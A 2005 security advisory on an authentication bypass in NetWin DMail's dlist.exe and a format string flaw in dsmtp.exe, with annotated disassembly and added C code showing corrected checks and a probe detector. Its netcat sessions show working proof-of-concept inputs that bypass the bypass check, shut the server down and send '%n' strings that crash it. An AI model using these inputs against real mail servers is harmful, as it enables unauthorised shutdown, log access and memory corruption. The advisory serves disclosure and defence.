[NT] NetWin DMail Authentication Bypass (dlist.exe) and Format String (dsmtp.exe)
From: SecuriTeam (support_at_securiteam.com)
Date: 05/04/05
To: list@securiteam.com Date: 4 May 2005 19:27:04 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
NetWin DMail Authentication Bypass (dlist.exe) and Format String (dsmtp.exe)
------------------------------------------------------------------------
SUMMARY
" <http://netwinsite.com/dmail_first.htm> NetWin DMail is an easy to
install, high performance, reliable and scalable mail server. It can
either be used as a small personal mail server or as a 10 Million user ISP
mail system. Flexible authentication modules allow you to plug DMail into
any existing user database. It includes many SPAM prevention mechanisms
and the ability to run any of several virus checking packages of your
choice."
An authentication bypass (dlist.exe) and a format string vulnerability
(dsmtp.exe) were discovered in the DMail mail server. Exploiting these
vulnerabilities allows a malicious attacker to gain full control over the
system.
DETAILS
Vulnerable Systems:
* DMail version 3.1a NT (dm31b_win32.exe)
The NetWin DMail server package consists of the SMTP server (dsmtp.exe),
the POP server (dpop.exe), the mailing list server (dlist.exe), and the
GUI management tool (dmadmin.exe). The GUI management tool (dmadmin.exe)
allows the administrator to manage the three servers and to retrieve live
logs from them. dmadmin.exe sends administrative commands to each of these
three servers via their respective listening ports. dmadmin.exe must
authenticate to these servers using an administrative password (or
password hash) when sending the administrative commands.
dlist.exe Authentication Bypass Vulnerability:
DList is the mailing list server that is part of the DMail package. DList
listens on port 7111 and accepts administrative commands from dmadmin.exe
(the GUI management tool). These administrative commands are issued by
dmadmin.exe to receive logs from the DList server and/or to shutdown the
server.
When issuing an administrative command, dmadmin.exe must authenticate to
the DList server using a numeric hash of the administrative password.
However, it is possible to bypass this authentication and issue sendlog or
shutdown commands to the DList server without knowing the password hash. A
remote attacker may connect to the mailing list server on port 7111,
bypass its authentication, and shut it down or receive logs from it.
The following session illustrates this.
C:\> nc 192.168.2.104 7111
hash 10687
password 234343 // suppose we do not know the password hash
err Password wrong
shutdown 234343 // we're not authenticated, so we can't shut down the server
error NOT AUTHORIZED YET
shutdown 234343
error NOT AUTHORIZED YET
sendlog 234343 // the sendlog command has a bug that causes us to be authenticated as long as the atoi value of the hash we sent is neither 0 nor 1
ok Dlist 3.1a, loglevel info, sending log to this channel
log 29 01:14:02 info: Process request on chan 3 - done
shutdown 234343 // now we can shutdown the server
log 29 01:14:14 info: Process request on chan 1
The problem lies in the _cmd_sendlog function, shown below. The NEG / SBB /
INC sequence that follows the call to _lib_hash (see the comments on those
instructions) reduces the computed hash to a 0-or-1 value before it is
compared, and the use of JNZ means that the user is considered to be
"authenticated" as long as the atoi value of the supplied hash is neither 0
nor 1.
0041104F CALL dlist._tellnews_pass // Retrieve admin password
00411054 PUSH EAX
00411055 CALL dlist._lib_hash // Compute the hash of admin password
0041105A ADD ESP,8 // Hash in EAX
0041105D MOV ESI,EAX // Hash in ESI
0041105F NEG ESI
00411061 SBB ESI,ESI // ESI will be 0 or FFFFFFFF
00411063 INC ESI // ESI will be 1 or 0
00411064 MOV EDX,DWORD PTR SS:[EBP+C]
00411067 PUSH EDX // Pointer to user supplied hash
00411068 CALL dlist._atoi // Convert to integer
0041106D ADD ESP,4
00411070 CMP ESI,EAX // Compare ESI (1 or 0) with atoi value of user supplied hash
00411072 JNZ SHORT dlist.004110D5 // i.e. Authenticated if atoi(user_supplied_hash) != 0 and != 1
00411074 PUSH dlist.0043339C // Arg2 = 0043339C ASCII "err Password incorrect"
00411079 MOV EAX,DWORD PTR SS:[EBP+8]
0041107C MOV ECX,DWORD PTR DS:[EAX*4+459590]
00411083 PUSH ECX // Arg1
00411084 CALL dlist._tcp_printf // Reply "err Password incorrect" to user
..
..
..
004110D5 MOV EDX,DWORD PTR SS:[EBP+8]
004110D8 MOV DWORD PTR DS:[EDX*4+459634],1 // Set "Authenticated" to TRUE
004110E3 MOV EAX,DWORD PTR SS:[EBP+8]
004110E6 MOV DWORD PTR DS:[EAX*4+4595E0],1
004110F1 CALL dlist._log_getlvl
// Since output of _lib_hash is usually not 0, CF will be set by NEG ESI.
Hence, "SBB ESI, ESI" will be FFFFFFFF, and
// INC ESI will give 0. i.e. user will be authenticated as long as
atoi(user_supplied_hash) != 0.
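To make the effect of the NEG / SBB / INC sequence concrete, the following is an added example (not code from the advisory or from NetWin) that restates the check exactly as the disassembly performs it, next to the comparison the function was evidently meant to do. The hash routine is a constructed stand-in for dlist's _lib_hash, since only the fact that it normally returns a non-zero value matters here.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed stand-in for dlist._lib_hash: a real hash is almost never 0,
 * which is the property the bug depends on. Any non-zero value would do. */
unsigned long lib_hash_stub(const char *password) {
    unsigned long h = 5381;
    for (; *password; password++)
        h = h * 33 + (unsigned char)*password;
    return h ? h : 1;  /* keep it non-zero, like a real hash normally is */
}

/* The check as compiled into _cmd_sendlog:
 *   NEG ESI; SBB ESI,ESI; INC ESI   -> ESI = (hash == 0) ? 1 : 0
 *   CMP ESI,EAX; JNZ authenticated  -> any mismatch counts as authenticated
 * With a non-zero admin hash this means atoi(user_hash) != 0 is enough. */
int sendlog_auth_as_compiled(const char *user_hash, unsigned long admin_hash) {
    unsigned long esi = (admin_hash == 0) ? 1UL : 0UL;   /* NEG/SBB/INC */
    unsigned long eax = (unsigned long)atoi(user_hash);  /* CALL _atoi */
    return esi != eax;                                   /* CMP; JNZ */
}

/* What the check should do: parse the whole token as a decimal number and
 * authenticate only on an exact match with the admin password hash. */
int sendlog_auth_fixed(const char *user_hash, unsigned long admin_hash) {
    char *end;
    errno = 0;
    unsigned long supplied = strtoul(user_hash, &end, 10);
    if (errno != 0 || end == user_hash || *end != '\0')
        return 0;                       /* not a clean decimal number */
    return supplied == admin_hash;
}

int main(void) {
    unsigned long admin = lib_hash_stub("admin-password");  /* constructed */
    /* The "password 234343 ... sendlog 234343" sequence from the advisory */
    printf("compiled check, wrong hash 234343: %s\n",
           sendlog_auth_as_compiled("234343", admin) ? "authenticated" : "rejected");
    printf("fixed check,    wrong hash 234343: %s\n",
           sendlog_auth_fixed("234343", admin) ? "authenticated" : "rejected");
    return 0;
}
```

The fixed version also rejects tokens that are not purely numeric, which atoi silently accepts; that is the second thing to look for when reviewing numeric password-hash comparisons like this one.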
dsmtp.exe Admin Commands Format String Vulnerability.
DSmtp is the SMTP server of the DMail package. DSmtp listens on port 25
for SMTP commands and also accepts admin commands from dmadmin.exe on the
same port. These administrative commands allow dmadmin.exe to receive logs
from the DSmtp server, shut down the server, and/or request specific
information from the server. A format string vulnerability exists in several
of these administrative commands, as shown below. Note that this
vulnerability can only be exploited if the administrative password is known.
C:\> nc 192.168.2.104 25
220 xxxxxxx DSMTP ESMTP Mail Server
xtellmail 123456 %.8X%.8X // incorrect admin password
-ERR Invalid password, command rejected
xtellmail 123123 test // supply an invalid admin command with the correct admin password (123123)
-ERR Unknown tellsmtp command (test)
xtellmail 123123 %.8X%.8X%.8X%.8X // supply a format string as the admin command
-ERR Unknown tellsmtp command (302F3932313020333A33343A20203835) // contents of stack printed
xtellmail 123123 %n%n%n%n%n // this will cause a crash
..CRASH.....
C:\> nc 192.168.2.104 25
220 xxxxxxx DSMTP ESMTP Mail Server
xtellmail 123123 encode test
+DATA encoding test gives dGVzdAAA
+OK Done
xtellmail 123123 encode %.8X%.8X%.8X%.8X
+DATA encoding 00000006001114440000000000000000 gives
JS44WCUuOFglLjhYJS44WAAA
+OK Done
xtellmail 123123 encode %n%n%n%n
..CRASH.....
This vulnerability is due to the unsafe use of the _vsnprintf function in
_xmsg(char *formatstr, ...) and _tcp_printf(arg1, char *formatstr, ...).
This is illustrated below.
_cmd_tellmail(arg1, arg2, arg3, arg4, arg5)
{
...
...
// unknown tellsmtp command: the user-supplied command name is passed as
// the %s argument here, which by itself is safe
_xmsg("-ERR Unknown tellsmtp command (%s)", "%n%n%n%n");
...
}
_xmsg(char *formatstr, ...)
{
va_list arglist;
va_start(arglist, formatstr);
// formatstr is "-ERR Unknown tellsmtp command (%s)"
// arglist points to "%n%n%n%n"
_vsnprintf(buffer, count, formatstr, arglist);
va_end(arglist);
// buffer is now "-ERR Unknown tellsmtp command (%n%n%n%n)"
// the finished reply is passed on as the *format string* of _tcp_printf
_tcp_printf(arg, buffer);
}
_tcp_printf(arg1, char *formatstr, ...)
{
// formatstr is "-ERR Unknown tellsmtp command (%n%n%n%n)"
// arglist points to somewhere on the stack, so the %n directives in the
// user-supplied text are interpreted and write to stack-derived addresses
_vsnprintf(buffer, count, formatstr, arglist);
}
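The fix is to stop the formatted reply from ever becoming a format string again. The following added example (not code from the advisory or from NetWin) shows a corrected reply path in which the trusted literal is formatted once and the result is sent as plain data, so text such as "%.8X%.8X" or "%n%n%n%n" arriving in the command name is copied into the reply literally. The socket write is replaced by a constructed in-memory channel so the reply can be inspected; the detection helper and its assumption that legitimate dmadmin.exe commands contain no conversion specifiers are mine, not the product's.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define REPLY_MAX 128

/* Constructed stand-in for the socket write: the last reply is kept in a
 * static buffer so it can be examined. */
static char g_channel[REPLY_MAX];

static int tcp_send(const char *text) {
    size_t n = strlen(text);
    if (n >= sizeof g_channel)
        n = sizeof g_channel - 1;
    memcpy(g_channel, text, n);
    g_channel[n] = '\0';
    return (int)n;
}

/* Corrected reply builder. The format string is always a literal owned by
 * the caller; untrusted text enters only as a %s argument, and the finished
 * buffer goes to tcp_send as data, never to another printf-style function
 * as its format. That single change removes the bug shown in _xmsg/_tcp_printf. */
static int reply_printf(const char *fmt, ...) {
    char buf[REPLY_MAX];
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(buf, sizeof buf, fmt, ap);
    va_end(ap);
    return tcp_send(buf);
}

/* The "-ERR Unknown tellsmtp command (...)" reply for an unrecognised
 * admin command. Returns the text that was sent. */
const char *reply_unknown_command(const char *cmd) {
    reply_printf("-ERR Unknown tellsmtp command (%s)", cmd);
    return g_channel;
}

/* Simple detection hook (assumption: a legitimate dmadmin.exe command never
 * contains a '%'): worth logging at the point where admin commands are parsed,
 * since a conversion specifier in that field is a probe for exactly this bug. */
int looks_like_format_probe(const char *cmd) {
    return strchr(cmd, '%') != NULL;
}

int main(void) {
    /* Constructed inputs mirroring the advisory's session */
    const char *inputs[] = { "test", "%.8X%.8X%.8X%.8X", "%n%n%n%n" };
    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++) {
        printf("%s%s\n", reply_unknown_command(inputs[i]),
               looks_like_format_probe(inputs[i]) ? "   [format probe logged]" : "");
    }
    return 0;
}
```

When auditing code like _tcp_printf, compiling with GCC's -Wformat -Wformat-security flags reports every call that passes a non-literal as the format with no arguments, which is the pattern the "_tcp_printf(arg, buffer)" call matches.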
Workaround:
1) Block port 7111 with your firewall
2) Set a strong administrative password
ADDITIONAL INFORMATION
The information has been provided by Chew Keong TAN
<mailto:chewkeong@security.org.sg>.
The original article can be found at:
http://www.security.org.sg/vuln/dmail31a.html